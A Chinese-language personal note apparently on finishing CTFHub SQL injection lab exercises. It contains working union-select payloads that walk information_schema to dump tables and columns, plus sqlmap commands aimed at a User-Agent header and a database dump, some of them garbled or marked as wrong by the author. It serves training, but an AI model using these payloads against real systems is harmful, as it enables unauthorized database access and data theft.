终于搞完了,对比了一下手写和sqlmap,我发现对于这种做题,真的除了盲注还是用手写更快一点,因为这玩意根本不带注入点的,还得自己写,还得为一个不存在的id配合sqlmap的选择,然后sqlmap又炸了,还是自己手写写某些简单。
特别是这个UA搞了我好久用sqlmap写半天不兼容,文件一直报错麻了
学了这么久的sql注入终于学完了,应该能拿个70分吧(想peach)下一步学其他的咯。
除了bool盲注直接丢给sqlmap是最好的,其他方法都可以用万能的步骤
这是union的
id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata
id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema ="sqli"
表merzhlhmyg
id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name ="merzhlhmyg"
列rsonbzfqgd
id=1 and 1=2 union select 1,rsonbzfqgd from sqli.merzhlhmyg
报错处理直接把updatexml函数就行,代码原理都是一样,直接丢给sqlmap.
建议抓包
抓包数据的
get头要有注入点,写也得写个id=1.
且需要设置参数和cookie不同:
复制来的sqlmap -r “a.txt” -p “User-Agent” –dbms mysql -p指定User-Agent参数指定username参数,-dbms指定了数据库
level设置3
url: CTFHub 环境实例 | 提示信息
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
错误//sqlmap -u "CTFHub 环境实例 | 提示信息" --header "iMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" --level 3
sqlmap.py -r "1.txt" -p "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" -level 3
sqlmap.py -r "1.txt" -level 3
sqlmap.py -u "challenge-edc12a985d8c775d.sandbox.ctfhub.com:10800"
sqlmap.py -r "2.txt" -level 3 -D sqli --dump --batch
妈的发现文本有问题,直接换手写,服了
id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata
id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema ="sqli"
得到表ejwxqvuckx
id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name ="ejwxqvuckx"
得到列kerelgnjvp
id=1 and 1=2 union select 1,kerelgnjvp from sqli.ejwxqvuckx
累死浪费一个小时了